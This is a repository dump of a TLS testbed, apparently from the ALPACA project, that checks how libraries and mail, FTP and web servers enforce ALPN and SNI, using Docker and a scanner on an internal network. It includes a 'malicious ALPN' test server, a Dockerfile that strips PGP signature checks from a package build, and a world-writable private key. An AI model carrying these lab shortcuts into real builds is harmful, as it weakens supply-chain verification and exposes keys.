"-m"] 15 | rustls-client: 16 | image: tls-rustls 17 | command: [ "./client.sh", "/client", "rustls-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - rustls-server 20 | - openssl-server-wrong-cn 21 | - openssl-malicious-alpn 22 | -------------------------------------------------------------------------------- /evaluation-libraries/rustls/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from rustls-client --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-wolfssl VERSION 0.1.0) 3 | 4 | add_subdirectory(client) 5 | add_subdirectory(server) 6 | -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage as tls-wolfssl 3 | ARG VERSION=4.8.1-stable 4 | WORKDIR /build 5 | RUN git clone --depth=1 --branch=v${VERSION} https://github.com/wolfSSL/wolfssl 6 | WORKDIR /build/wolfssl 7 | RUN ./autogen.sh 8 | RUN ./configure --prefix=/build/ --enable-static --enable-sni --enable-alpn 9 | RUN make 10 | WORKDIR /build 11 | ADD server /build/server 12 | ADD client /build/client 13 | ADD CMakeLists.txt /build/CMakeLists.txt 14 | RUN cmake . .. && make 15 | RUN mv /build/server/server / 16 | RUN mv /build/client/client / 17 | COPY --from=tls-openssl /openssl-client /openssl-client 18 | WORKDIR / 19 | CMD ["/server"] 20 | -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/README.md: -------------------------------------------------------------------------------- 1 | # wolfssl example with strict sni and strict alpn 2 | 3 | Tested with wolfssl 4.8.1-stable 4 | 5 | Based on https://github.com/wolfSSL/wolfssl-examples 6 | 7 | needs tls-baseimage already in docker 8 | 9 | 10 | ```bash 11 | ./run.sh 12 | ``` -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/build.sh: -------------------------------------------------------------------------------- 1 | docker build --build-arg VERSION=4.8.1-stable . -t tls-wolfssl -f Dockerfile -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/client/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(client VERSION 0.1.0) 3 | 4 | add_library(wolfssl STATIC IMPORTED) 5 | set_target_properties(wolfssl PROPERTIES 6 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/wolfssl/src/.libs/libwolfssl.a" 7 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/wolfssl" 8 | ) 9 | add_executable(client client.c) 10 | target_link_libraries(client wolfssl m) 11 | target_compile_options(client PRIVATE -Wall -Wextra) 12 | -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/client/client.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | int tcp_connect(const char *hostname, const char *port) { 12 | int sockfd, portno; 13 | struct sockaddr_in serv_addr; 14 | struct hostent *server; 15 | portno = atoi(port); 16 | sockfd = socket(AF_INET, SOCK_STREAM, 0); 17 | if (sockfd < 0) 18 | printf("ERROR opening socket"); 19 | server = gethostbyname(hostname); 20 | if (server == NULL) { 21 | fprintf(stderr, "ERROR, no such host\n"); 22 | exit(0); 23 | } 24 | bzero((char *)&serv_addr, sizeof(serv_addr)); 25 | serv_addr.sin_family = AF_INET; 26 | bcopy((char *)server->h_addr, 27 | (char *)&serv_addr.sin_addr.s_addr, 28 | server->h_length); 29 | serv_addr.sin_port = htons(portno); 30 | int err = connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); 31 | if (err < 0) { 32 | fprintf(stderr, "Connect error\n"); 33 | exit(1); 34 | } 35 | return sockfd; 36 | } -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | wolfssl-server: 8 | image: tls-wolfssl 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | wolfssl-client: 16 | image: tls-wolfssl 17 | command: [ "./client.sh", "/client", "wolfssl-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - wolfssl-server 20 | - openssl-server-wrong-cn 21 | - openssl-malicious-alpn 22 | -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from wolfssl-client --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/server/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(server VERSION 0.1.0) 3 | 4 | add_library(wolfssl STATIC IMPORTED) 5 | set_target_properties(wolfssl PROPERTIES 6 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/wolfssl/src/.libs/libwolfssl.a" 7 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/wolfssl" 8 | ) 9 | add_executable(server server.c) 10 | target_link_libraries(server wolfssl m) 11 | target_compile_options(server PRIVATE -Wall -Wextra) 12 | -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/server/server.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | int create_socket(uint16_t port) { 8 | int listen_sd; 9 | struct sockaddr_in sa_serv; 10 | int optval = 1; 11 | /* Socket operations */ 12 | listen_sd = socket(AF_INET, SOCK_STREAM, 0); 13 | 14 | memset(&sa_serv, '\0', sizeof(sa_serv)); 15 | sa_serv.sin_family = AF_INET; 16 | sa_serv.sin_addr.s_addr = INADDR_ANY; 17 | sa_serv.sin_port = htons(port); 18 | 19 | setsockopt(listen_sd, SOL_SOCKET, SO_REUSEADDR, (void *)&optval, sizeof(int)); 20 | 21 | bind(listen_sd, (struct sockaddr *)&sa_serv, sizeof(sa_serv)); 22 | 23 | return listen_sd; 24 | } 25 | -------------------------------------------------------------------------------- /evaluation-servers/.gitignore: -------------------------------------------------------------------------------- 1 | *tar.gz 2 | httpd-* 3 | nginx-* 4 | sendmail-* -------------------------------------------------------------------------------- /evaluation-servers/README.md: -------------------------------------------------------------------------------- 1 | # alpaca-server 2 | Testing TLS Servers ALPN and SNI Implementation. 3 | 4 | Scans each Server with TLS-Scanner https://github.com/tls-attacker/TLS-Scanner 5 | 6 | ## Requirements 7 | - docker and docker-compose 8 | - baseimage Docker containers from evaluation-libraries 9 | 10 | ---------------- 11 | ## Running Servers 12 | 1. Build the baseimage from evaluation-libraries. 13 | 2. Build the TLS-Scanner container with ``./build.sh`` 14 | 3. Go into any subdirectory and do ``./run.sh`` 15 | 16 | ## Server overview and versions tested 17 | 'strict' means the server rejects the connection if he doesn't recognize the ALPN or SNI sent. 18 | | Server | ALPN |SNI | 19 | | ------------- | ------------- | ------------- | 20 | | apache 2.4.51 | not strict | not strict | 21 | | nginx 1.21.4 | strict | not strict | 22 | | lighttpd 1.4.63 | strict | not strict | 23 | | postfix/smtpd 3.6.2 | ------------ | not strict | 24 | | openSMTPD 6.8.0 | ------------ | ------------ | 25 | | sendmail 8.17.1 | ------------ | ------------ | 26 | | exim 4.95 | strict | ------------ | 27 | | Courier 5.10 | strict | not strict | 28 | | Dovecot 2.3.13 | ------------ | not strict | 29 | | pure-ftpd 1.0.49 | ------------ | not strict | 30 | | cyrus 3.4.2-1 | strict in master only https | not strict | 31 | | ProFTPD 1.3.8rc2 | ------------ | strict | 32 | | vsftpd 3.0.5 | strict | strict | 33 | | filezilla server 1.1.0 | strict | not strict | 34 | 35 | 36 | -------------------------------------------------------------------------------- /evaluation-servers/apache/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM httpd:2.4.51 as tls-apache 2 | COPY ./apache.conf /usr/local/apache2/conf/httpd.conf 3 | COPY --from=tls-baseimage /etc/ssl/cert-data/tls-server.com-chain.crt /usr/local/apache2/conf/server-chain.crt 4 | COPY --from=tls-baseimage /etc/ssl/cert-data/tls-server.com.crt /usr/local/apache2/conf/server.crt 5 | COPY --from=tls-baseimage /etc/ssl/cert-data/tls-server.com.key /usr/local/apache2/conf/server.key -------------------------------------------------------------------------------- /evaluation-servers/apache/apache.conf: -------------------------------------------------------------------------------- 1 | LoadModule socache_shmcb_module modules/mod_socache_shmcb.so 2 | LoadModule authn_file_module modules/mod_authn_file.so 3 | LoadModule authn_core_module modules/mod_authn_core.so 4 | LoadModule authz_host_module modules/mod_authz_host.so 5 | LoadModule authz_groupfile_module modules/mod_authz_groupfile.so 6 | LoadModule authz_core_module modules/mod_authz_core.so 7 | LoadModule authz_user_module modules/mod_authz_user.so 8 | LoadModule reqtimeout_module modules/mod_reqtimeout.so 9 | LoadModule filter_module modules/mod_filter.so 10 | LoadModule mime_module modules/mod_mime.so 11 | LoadModule env_module modules/mod_env.so 12 | LoadModule setenvif_module modules/mod_setenvif.so 13 | LoadModule version_module modules/mod_version.so 14 | LoadModule unixd_module modules/mod_unixd.so 15 | LoadModule headers_module modules/mod_headers.so 16 | LoadModule mpm_event_module modules/mod_mpm_event.so 17 | LoadModule log_config_module modules/mod_log_config.so 18 | LoadModule ssl_module modules/mod_ssl.so 19 | LoadModule status_module modules/mod_status.so 20 | LoadModule dir_module modules/mod_dir.so 21 | LoadModule alias_module modules/mod_alias.so 22 | LoadModule autoindex_module modules/mod_autoindex.so 23 | LoadModule http2_module modules/mod_http2.so 24 | Include conf/extra/httpd-ssl.conf 25 | 26 | 27 | User daemon 28 | Group daemon 29 | 30 | 31 | ServerRoot "/usr/local/apache2" 32 | ServerName tls-server:4433 33 | 34 | SSLProtocol +TLSv1.2 +TLSv1.3 35 | 36 | Listen 4433 37 | 38 | Protocols h2 http/1.1 39 | DocumentRoot "/usr/local/apache2/htdocs" 40 | ServerName tls-server 41 | SSLEngine on 42 | SSLCertificateFile /usr/local/apache2/conf/server.crt 43 | SSLCertificateKeyFile /usr/local/apache2/conf/server.key 44 | SSLCertificateChainFile /usr/local/apache2/conf/server-chain.crt 45 | 46 | -------------------------------------------------------------------------------- /evaluation-servers/apache/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-apache 2 | -------------------------------------------------------------------------------- /evaluation-servers/apache/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | httpd: 8 | image: tls-apache 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - httpd 13 | command: [ "-connect", "httpd:4433", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] 14 | -------------------------------------------------------------------------------- /evaluation-servers/apache/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/build.sh: -------------------------------------------------------------------------------- 1 | git clone https://github.com/tls-attacker/TLS-Scanner.git 2 | cd TLS-Scanner 3 | git submodule update --init --recursive 4 | docker build . -t tlsscanner -------------------------------------------------------------------------------- /evaluation-servers/courier/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage-archlinux 2 | 3 | # Avoid ERROR: invoke-rc.d: policy-rc.d denied execution of start. 4 | #RUN echo "#!/bin/sh\nexit 0" > /usr/sbin/policy-rc.d 5 | 6 | RUN pacman -Syu --noconfirm 7 | 8 | USER build 9 | 10 | ## Version 1.1.5-2 11 | 12 | WORKDIR /src/ 13 | RUN git clone https://aur.archlinux.org/courier-unicode.git 14 | WORKDIR /src/courier-unicode 15 | RUN git checkout b08066fde2b4147076cb3201888fc2ee68eed19c 16 | RUN makepkg -si --noconfirm 17 | 18 | WORKDIR /src/ 19 | RUN git clone https://aur.archlinux.org/courier-authlib.git 20 | WORKDIR /src/courier-authlib 21 | RUN git checkout 125c9823c551500428857a503f2d4a3b795aa589 22 | RUN makepkg -si --noconfirm 23 | 24 | WORKDIR /src/ 25 | RUN git clone https://aur.archlinux.org/courier-mta.git 26 | WORKDIR /src/courier-mta 27 | RUN git checkout 359ca3946091a4634d1c6aab60df2e079cdde08 28 | RUN makepkg -si --noconfirm 29 | 30 | USER root 31 | #ARG DEBIAN_FRONTEND=noninteractive 32 | #RUN apt-get update && apt-get install -yq courier-imap 33 | RUN cp /etc/ssl/cert-data/tls-server.com-chain.crt /etc/courier/imapd.cert 34 | RUN cp /etc/ssl/cert-data/tls-server.com-chain.crt /etc/courier/pop3d.cert 35 | RUN cp /etc/ssl/cert-data/tls-server.com.key /etc/courier/imapd.key 36 | RUN cp /etc/ssl/cert-data/tls-server.com.key /etc/courier/pop3d.key 37 | ADD start.sh /root/ 38 | ADD imapd-ssl /etc/courier/ 39 | RUN chmod +x /root/start.sh 40 | CMD ["/root/start.sh"] -------------------------------------------------------------------------------- /evaluation-servers/courier/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-courier 2 | 3 | -------------------------------------------------------------------------------- /evaluation-servers/courier/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | courier: 8 | image: tls-courier 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - courier 13 | command: [ "-connect", "courier:993", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/courier/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/courier/smtpd.conf: -------------------------------------------------------------------------------- 1 | # $OpenBSD: smtpd.conf,v 1.10 2018/05/24 11:40:17 gilles Exp $ 2 | 3 | # This is the smtpd server system-wide configuration file. 4 | # See smtpd.conf(5) for more information. 5 | 6 | table aliases file:/etc/aliases 7 | 8 | pki tls-server.com cert "/etc/ssl/cert-data/tls-server.com-chain.crt" 9 | pki tls-server.com key "/etc/ssl/cert-data/tls-server.com.key" 10 | 11 | # To accept external mail, replace with: listen on all 12 | # 13 | #listen on 0.0.0.0 smtps 14 | 15 | listen on 0.0.0.0 tls pki tls-server.com 16 | listen on 0.0.0.0 port 465 smtps pki tls-server.com 17 | listen on 0.0.0.0 port 587 tls-require pki tls-server.com 18 | 19 | action "local" maildir alias 20 | action "relay" relay 21 | 22 | # Uncomment the following to accept external mail for domain "example.org" 23 | # 24 | # match from any for domain "example.org" action "local" 25 | match for local action "local" 26 | match from local for any action "relay" -------------------------------------------------------------------------------- /evaluation-servers/courier/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | mkdir -p /run/courier/authdaemon 3 | touch /run/courier/authdaemon/pid.lock 4 | touch /run/courier/imapd-ssl.pid.lock 5 | makeimapaccess 6 | /usr/sbin/authdaemond start 7 | /usr/sbin/imapd start 8 | /usr/sbin/imapd-ssl start 9 | while true; do sleep 1000; done -------------------------------------------------------------------------------- /evaluation-servers/cyrus/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage-archlinux 2 | 3 | RUN pacman -Syu --noconfirm 4 | 5 | USER build 6 | 7 | #Fixed to Version 3.4.2 8 | 9 | WORKDIR /src/ 10 | RUN git clone https://aur.archlinux.org/perl-pod-pom.git 11 | WORKDIR /src/perl-pod-pom 12 | RUN git checkout 2699d4b77c2fb0573b1445968afaca4aa36299d4 13 | RUN makepkg -si --noconfirm 14 | 15 | WORKDIR /src/ 16 | RUN git clone https://aur.archlinux.org/perl-pod-pom-view-restructured.git 17 | WORKDIR /src/perl-pod-pom-view-restructured 18 | RUN git checkout 80138742fbb711e3a56b4018ce4dcc7f0ec1b212 19 | RUN makepkg -si --noconfirm 20 | 21 | WORKDIR /src/ 22 | RUN git clone https://aur.archlinux.org/cyrus-imapd.git 23 | WORKDIR /src/cyrus-imapd 24 | RUN git checkout a1e53ee172fc37431080dd3ff3685ffd2a2378e5 25 | #remove pgp key from PKGBUILD 26 | RUN sed -i '/^validpgpkeys/d' PKGBUILD 27 | RUN sed -i 's/{,.sig}//g' PKGBUILD 28 | RUN sed -i '/'SKIP'/d' PKGBUILD 29 | RUN makepkg -si --noconfirm 30 | 31 | USER root 32 | 33 | RUN echo "tls-server" >> /etc/hostname 34 | RUN echo "tls-server 127.0.0.1" >> /etc/hosts 35 | 36 | ADD cyrus.conf /etc/cyrus/cyrus.conf 37 | ADD imapd.conf /etc/cyrus/imapd.conf 38 | 39 | CMD ["/usr/lib/cyrus/master"] 40 | 41 | -------------------------------------------------------------------------------- /evaluation-servers/cyrus/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-cyrus 2 | 3 | -------------------------------------------------------------------------------- /evaluation-servers/cyrus/cyrus.asc: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP PUBLIC KEY BLOCK----- 2 | 3 | mQENBFU5pZUBCAC+m05W9nJnBkrfFO9I+iimF1WCsSZNFoASJ3WEeZxIkOQO9BZj 4 | aKf8EP/nK7nEfNGZ2m+OrAtQU/+I8Sk1ppHuwZgENLvRzLsBGbv80kDKBw31Nd1f 5 | sCpVQs4b8zlohXjq0UN8tT5NcGJnGE7ahoOHzJk/0Ll76oVmOZvSw+WHBp1945m2 6 | Q8CbIbfmyuv7NF6GtGDVilPeIPsDnh5w5usjpKsxjYHKpy6Rtf4MbcCLtkRbHFra 7 | KJD+xum0PgPdCAEEbQsSXQgwOd0TZ59avRVVef674PjWqIuudUGUhJ/f9OWOj7LG 8 | 6QgJR6yvCy7Bc2eAN4RnIIzaUZGaJDKDCNozABEBAAG0ImVsbGllIHRpbW9uZXkg 9 | PGVsbGllQGZhc3RtYWlsLmNvbT6JATgEEwECACIFAlU5pZUCGwMGCwkIBwMCBhUI 10 | AgkKCwQWAgMBAh4BAheAAAoJEFVPBP6zY3jgb9gH/3GPDLGybo7SYZMtBmfe+Udf 11 | tcRkTtH+o2pf2rh6KwPhhEDuOXWVCIUPWXsWIVU2K5Y8AdBIHOEoSUp3n8juV57I 12 | u9CfDI718/WaHgEpYrq5DqyROAFr+sGahcb6C40+V/CeUSAmKVhFGniuALUSAQ+B 13 | XVj/i2EAFNg/5ALkPYDnDYDqm7Ak6odDbktYQz987y38sg3EMC/2wi2EoOG1VWeG 14 | twFD8HKmXZw+u6cYtFh9K1hOBZm+PhLHr3h1MHTuWYeBKkT3YqaGtXMwi704LlNr 15 | HU8beOHSNBSsVYJ61B4kgBA7p+qnx6xIpU2KfAJl8cgjCYwrq8yo+Lm9TazagfM= 16 | =dIwC 17 | -----END PGP PUBLIC KEY BLOCK----- -------------------------------------------------------------------------------- /evaluation-servers/cyrus/cyrus.conf: -------------------------------------------------------------------------------- 1 | # standard standalone server implementation 2 | 3 | START { 4 | # do not delete this entry! 5 | recover cmd="ctl_cyrusdb -r" 6 | } 7 | 8 | # UNIX sockets start with a slash and are put into /run/cyrus/socket 9 | SERVICES { 10 | # add or remove based on preferences 11 | imap cmd="imapd" listen="imap" prefork=0 12 | imaps cmd="imapd -s" listen="imaps" prefork=0 13 | #pop3 cmd="pop3d" listen="pop3" prefork=0 14 | #pop3s cmd="pop3d -s" listen="pop3s" prefork=0 15 | sieve cmd="timsieved" listen="sieve" prefork=0 16 | 17 | # these are only necessary if receiving/exporting usenet via NNTP 18 | # nntp cmd="nntpd" listen="nntp" prefork=0 19 | # nntps cmd="nntpd -s" listen="nntps" prefork=0 20 | 21 | # these are only necessary if using HTTP for CalDAV, CardDAV, or RSS 22 | #http cmd="httpd" listen="http" prefork=0 23 | https cmd="httpd -s" listen="https" prefork=0 24 | 25 | # at least one LMTP is required for delivery 26 | # lmtp cmd="lmtpd" listen="lmtp" prefork=0 27 | lmtpunix cmd="lmtpd" listen="/run/cyrus/socket/lmtp" prefork=0 28 | 29 | # this is requied if using socketmap 30 | # smmap cmd="smmapd" listen="/run/cyrus/socket/smmap" prefork=0 31 | 32 | # this is required if using notifications 33 | # notify cmd="notifyd" listen="/run/cyrus/socket/notify" proto="udp" prefork=1 34 | } 35 | 36 | EVENTS { 37 | # this is required 38 | checkpoint cmd="ctl_cyrusdb -c" period=30 39 | 40 | # this is only necessary if using duplicate delivery suppression, 41 | # Sieve or NNTP 42 | delprune cmd="cyr_expire -E 3" at=0400 43 | 44 | # Expire data older than 28 days. 45 | deleteprune cmd="cyr_expire -E 4 -D 28" at=0430 46 | expungeprune cmd="cyr_expire -E 4 -X 28" at=0445 47 | 48 | # this is only necessary if caching TLS sessions 49 | tlsprune cmd="tls_prune" at=0400 50 | } 51 | 52 | DAEMON { 53 | # this is only necessary if using idled for IMAP IDLE 54 | # idled cmd="idled" 55 | } -------------------------------------------------------------------------------- /evaluation-servers/cyrus/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | cyrus: 8 | image: tls-cyrus 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - cyrus 13 | command: [ "-connect", "cyrus:993", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/cyrus/imapd.conf: -------------------------------------------------------------------------------- 1 | # Suggested minimal imapd.conf 2 | # See imapd.conf(5) for more information and more options 3 | 4 | # Space-separated users who have admin rights for all services. 5 | # NB: THIS MUST BE CONFIGURED 6 | admins: cyrus 7 | 8 | ################################################################### 9 | ## File, socket and DB location settings. 10 | ################################################################### 11 | 12 | # Configuration directory 13 | configdirectory: /var/lib/cyrus 14 | 15 | # Directories for proc and lock files 16 | proc_path: /run/cyrus/proc 17 | mboxname_lockpath: /run/cyrus/lock 18 | 19 | # Locations for DB files 20 | # The following DB are recreated upon initialization, so should live in 21 | # ephemeral storage for best performance. 22 | duplicate_db_path: /run/cyrus/deliver.db 23 | ptscache_db_path: /run/cyrus/ptscache.db 24 | statuscache_db_path: /run/cyrus/statuscache.db 25 | tls_sessions_db_path: /run/cyrus/tls_sessions.db 26 | 27 | # Which partition to use for default mailboxes 28 | defaultpartition: default 29 | partition-default: /var/spool/cyrus/mail 30 | 31 | # If sieveusehomedir is false (the default), this directory is searched 32 | # for Sieve scripts. 33 | sievedir: /var/spool/sieve 34 | 35 | ################################################################### 36 | ## Important: KEEP THESE IN SYNC WITH cyrus.conf 37 | ################################################################### 38 | 39 | lmtpsocket: /run/cyrus/socket/lmtp 40 | idlesocket: /run/cyrus/socket/idle 41 | notifysocket: /run/cyrus/socket/notify 42 | 43 | # Syslog prefix. Defaults to cyrus (so logging is done as cyrus/imap 44 | # etc.) 45 | syslog_prefix: cyrus 46 | 47 | ################################################################### 48 | ## Server behaviour settings 49 | ################################################################### 50 | 51 | # Space-separated list of HTTP modules that will be enabled in 52 | # httpd(8). This option has no effect on modules that are disabled at 53 | # compile time due to missing dependencies (e.g. libical). 54 | # 55 | # Allowed values: caldav, carddav, domainkey, ischedule, rss 56 | httpmodules: caldav carddav 57 | 58 | # If enabled, the partitions will also be hashed, in addition to the 59 | # hashing done on configuration directories. This is recommended if one 60 | # partition has a very bushy mailbox tree. 61 | hashimapspool: true 62 | 63 | # Enable virtual domains 64 | # and set default domain to localhost 65 | virtdomains: yes 66 | defaultdomain: tls-server 67 | 68 | # Use these credentials to run services 69 | cyrus_user: cyrus 70 | cyrus_group: mail 71 | 72 | ################################################################### 73 | ## User experience settings 74 | ################################################################### 75 | 76 | # Minimum time between POP mail fetches in minutes 77 | popminpoll: 1 78 | 79 | ################################################################### 80 | ## User Authentication settings 81 | ################################################################### 82 | 83 | # Allow plaintext logins by default (SASL PLAIN) 84 | allowplaintext: no 85 | 86 | ################################################################### 87 | ## SASL library options (these are handled directly by the SASL 88 | ## libraries, refer to SASL documentation for an up-to-date list of 89 | ## these) 90 | ################################################################### 91 | 92 | # The mechanism(s) used by the server to verify plaintext passwords. 93 | # Possible values are "saslauthd", "auxprop", "pwcheck" and 94 | # "alwaystrue". They are tried in order, you can specify more than one, 95 | # separated by spaces. 96 | sasl_pwcheck_method: saslauthd 97 | 98 | # If enabled, the SASL library will automatically create authentication 99 | # secrets when given a plaintext password. Refer to SASL documentation 100 | sasl_auto_transition: no 101 | 102 | ################################################################### 103 | ## SSL/TLS Options 104 | ################################################################### 105 | 106 | # File containing the global certificate used for ALL services (imap, 107 | # pop3, lmtp, sieve) 108 | tls_server_cert: /etc/ssl/cert-data/tls-server-chain.crt 109 | 110 | # File containing the private key belonging to the global server 111 | # certificate. 112 | tls_server_key: /etc/ssl/cert-data/tls-server.key 113 | 114 | 115 | # File containing one or more Certificate Authority (CA) certificates. 116 | #tls_client_ca_file: /etc/ssl/certs/cyrus-imapd-ca.pem 117 | 118 | # Path to directory with certificates of CAs. 119 | tls_client_ca_dir: /etc/ssl/certs 120 | 121 | # The length of time (in minutes) that a TLS session will be cached for 122 | # later reuse. The maximum value is 1440 (24 hours), the default. A 123 | # value of 0 will disable session caching. 124 | tls_session_timeout: 1440 125 | 126 | tls_ciphers: ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384 127 | tls_required: 1 128 | tls_prefer_server_ciphers: 1 129 | tls_versions: tls1_2 tls1_3 130 | servername: tls-server 131 | -------------------------------------------------------------------------------- /evaluation-servers/cyrus/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/dovecot/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimagedebian 2 | RUN apt-get update && apt-get install -y dovecot-imapd dovecot-pop3d 3 | RUN cp /etc/ssl/cert-data/tls-server.com-chain.crt /etc/dovecot/private/dovecot.pem 4 | RUN cp /etc/ssl/cert-data/tls-server.com.key /etc/dovecot/private/dovecot.key 5 | RUN echo "ssl_min_protocol = TLSv1.2" >> /etc/dovecot/conf.d/10-ssl.conf 6 | CMD ["dovecot", "-F"] -------------------------------------------------------------------------------- /evaluation-servers/dovecot/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-dovecot 2 | -------------------------------------------------------------------------------- /evaluation-servers/dovecot/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | dovecot: 8 | image: tls-dovecot 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - dovecot 13 | command: [ "-connect", "dovecot:993", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/dovecot/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/exim/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage 2 | RUN apk add exim 3 | ADD exim.conf /etc/exim/exim.conf 4 | 5 | RUN chmod 777 /etc/ssl/cert-data/tls-server.com-chain.crt 6 | RUN chmod 777 /etc/ssl/cert-data/tls-server.com.key 7 | 8 | USER exim 9 | #CMD ["exim", "-bd", "-d-all+pid", "-q30m"] 10 | ENTRYPOINT ["exim"] 11 | CMD ["-bd", "-v", "-oP", "/dev/null"] -------------------------------------------------------------------------------- /evaluation-servers/exim/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-exim 2 | -------------------------------------------------------------------------------- /evaluation-servers/exim/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | exim: 8 | image: tls-exim 9 | hostname: tls-exim 10 | scanner: 11 | image: tlsscanner 12 | depends_on: 13 | - exim 14 | command: [ "-connect", "exim:465", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/exim/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/filezilla-server/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage 2 | 3 | 4 | # RUN cat /etc/ssl/cert-data/tls-server.com.key >> /etc/ssl/private/pure-ftpd.pem 5 | # RUN cat /etc/ssl/cert-data/tls-server.com-chain.crt >> /etc/ssl/private/pure-ftpd.pem 6 | RUN apk add gnutls-dev wxgtk-dev pugixml-dev libexecinfo-dev 7 | 8 | ARG LIBVERSION=0.34.2 9 | WORKDIR /build 10 | RUN wget https://download.filezilla-project.org/libfilezilla/libfilezilla-${LIBVERSION}.tar.bz2 11 | RUN tar -xvf libfilezilla-${LIBVERSION}.tar.bz2 12 | WORKDIR /build/libfilezilla-${LIBVERSION} 13 | RUN ./configure --prefix=/usr 14 | RUN make 15 | RUN make install 16 | #RUN mv lib/.libs/libfilezilla.a /usr/lib/ 17 | 18 | ARG VERSION=1.1.0 19 | WORKDIR /build 20 | RUN wget https://download.filezilla-project.org/server/FileZilla_Server_${VERSION}_src.tar.bz2 21 | RUN tar -xvf FileZilla_Server_${VERSION}_src.tar.bz2 22 | WORKDIR /build/filezilla-server-${VERSION} 23 | RUN ./configure 